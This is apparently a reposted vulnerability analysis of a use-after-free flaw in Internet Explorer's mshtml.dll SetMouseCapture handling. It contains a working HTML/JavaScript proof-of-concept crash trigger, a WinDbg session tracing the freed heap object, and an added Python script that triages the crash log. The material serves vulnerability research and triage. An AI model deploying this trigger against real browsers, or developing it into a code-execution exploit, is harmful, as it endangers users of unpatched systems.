Microsoft Internet Explorer Remote Code Execution Vulnerability (CNNVD-201309-304)
Internet Explorer (IE) is a web browser developed by Microsoft and shipped as the default browser of the Windows operating system.
A remote code execution vulnerability exists in the SetMouseCapture implementation in mshtml.dll in Microsoft IE versions 6 through 11. The flaw is that the program accesses an object in memory that has already been deleted or was never correctly allocated. An attacker can exploit it by crafting a website and enticing a user to view it, causing memory corruption and executing arbitrary code in IE in the context of the current user. An attacker who successfully exploits the vulnerability gains the same user rights as the current user. If the current user is logged on with administrative rights, a successful attacker can take complete control of the affected system and could then install programs; view, change or delete data; or create new accounts with full user rights.
The PoC is as follows:
```html
<html>
<script>
function trigger() {
    Math.tan(3,4);                        // no-op padding calls kept from the original PoC
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    Math.sin(0);
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    Math.cos(0);
    id_1.applyElement(id_0);
    Math.tan(3,4);
    id_0.onlosecapture = function(e) {
        document.write("");               // tears down the current markup (see the freeing stack in the debugger log)
    };
    Math.sin(0);
    id_0['outerText'] = "";
    Math.cos(0);
    id_0.setCapture();
    Math.tan(3,4);
    id_1.setCapture();                    // capture moves to id_1, so id_0 receives onlosecapture
    Math.sin(0);
}
window.onload = function() {
    trigger();
}
</script>
</html>
```
The program crashes as shown below; the value in edi triggers the exception. Analysis shows that edi is passed in from the calling function and points into a heap block that has already been freed. The debugger record follows.
```
1:021> g
(ed4.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0
eip=656c1f60 esp=041ce618 ebp=041ce620 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:074a9fb0=????????
1:021> !heap -p -a edi
    address 074a9fb0 found in
    _DPH_HEAP_ROOT @ 1201000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7392478:          74a9000             2000
    6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
    771a7aca ntdll!RtlpFreeHeap+0x0000005d
    77172d68 ntdll!RtlFreeHeap+0x00000142
    75a5f1ac kernel32!HeapFree+0x00000014
    656be590 mshtml!CTreeNode::Release+0x0000002d
    656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
    656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055
    656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
    655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0
    65502bb4 mshtml!CDocument::open+0x00000426
    65500789 mshtml!CDocument::write+0x0000007c
    655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085
    656e235c mshtml!CBase::ContextInvokeEx+0x000005dc
    656e25d5 mshtml!CBase::InvokeEx+0x00000025
    656edf9a mshtml!DispatchInvokeCollection+0x0000014c
    656a4998 mshtml!CDocument::InvokeEx+0x000000f0
    65693148 mshtml!CBase::VersionedInvokeEx+0x00000020
    65693104 mshtml!PlainInvokeEx+0x000000eb
    6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104
    6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a
    6b4ea3f6 jscript!InvokeDispatchEx+0x00000098
    6b4ea4a0 jscript!VAR::InvokeByName+0x00000139
    6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d
    6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce
    6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80
    6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6b4f5bfb jscript!ScrFncObj::Call+0x0000008d
    6b4f5e11 jscript!CSession::Execute+0x0000015f
    6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5
    6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c
    65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
```
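The triage step described above, as an added example that is not part of the original post: a small Python parser that reads a WinDbg excerpt like the one just shown (a constructed copy of its key lines, embedded as CRASH_LOG) and classifies the fault as a use-after-free only when the register that was dereferenced holds exactly the address that `!heap -p -a` reports as a freed allocation; the function name `triage` and the constant name are my own.

```python
import re

# Constructed excerpt of the WinDbg session quoted above (page heap enabled via gflags).
CRASH_LOG = """\
(ed4.bd8): Access violation - code c0000005 (first chance)
eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:074a9fb0=????????
1:021> !heap -p -a edi
    address 074a9fb0 found in
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
    6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
    656be590 mshtml!CTreeNode::Release+0x0000002d
    656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
    65500789 mshtml!CDocument::write+0x0000007c
"""

REG_RE   = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")          # eax=..., edi=...
SYM_RE   = re.compile(r"^(\S+)\+0x[0-9a-f]+:$", re.M)            # faulting symbol line
DEREF_RE = re.compile(r"ptr \[(e[a-z]{2})\]")                    # register in the memory operand
ADDR_RE  = re.compile(r"address ([0-9a-f]{8}) found in")         # address !heap looked up
FRAME_RE = re.compile(r"^\s*[0-9a-f]{8} (\S+)\+0x[0-9a-f]+$", re.M)  # freeing-stack frames
RUNTIME  = ("verifier!", "ntdll!", "kernel32!")  # allocator plumbing, not the object's owner

def triage(log):
    """Classify a page-heap access violation from a WinDbg log excerpt.

    'kind' is 'use-after-free' only when the dereferenced register equals the
    address that !heap -p -a reports as lying in a freed allocation."""
    regs = dict(REG_RE.findall(log))
    sym, deref, addr = SYM_RE.search(log), DEREF_RE.search(log), ADDR_RE.search(log)
    reg = deref.group(1) if deref else None
    freed = ("free-ed allocation" in log and addr is not None
             and reg is not None and regs.get(reg) == addr.group(1))
    # Frames below the allocator show which code owned the object when it was freed.
    stack = [f for f in FRAME_RE.findall(log) if not f.startswith(RUNTIME)]
    return {
        "kind": "use-after-free" if freed else "access-violation",
        "faulting_symbol": sym.group(1) if sym else None,
        "deref_register": reg,
        "freed_address": addr.group(1) if freed else None,
        "freed_by": stack[0] if freed and stack else None,
        "freed_stack": stack if freed else [],
    }

if __name__ == "__main__":
    for key, value in triage(CRASH_LOG).items():
        print(f"{key}: {value}")
```

Run against the real session the outermost frames would continue into jscript, so the last entry of `freed_stack` is simply the deepest script-side caller the excerpt contains.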
Source: http://www.cnblogs.com/Ox9A82/p/5797123.html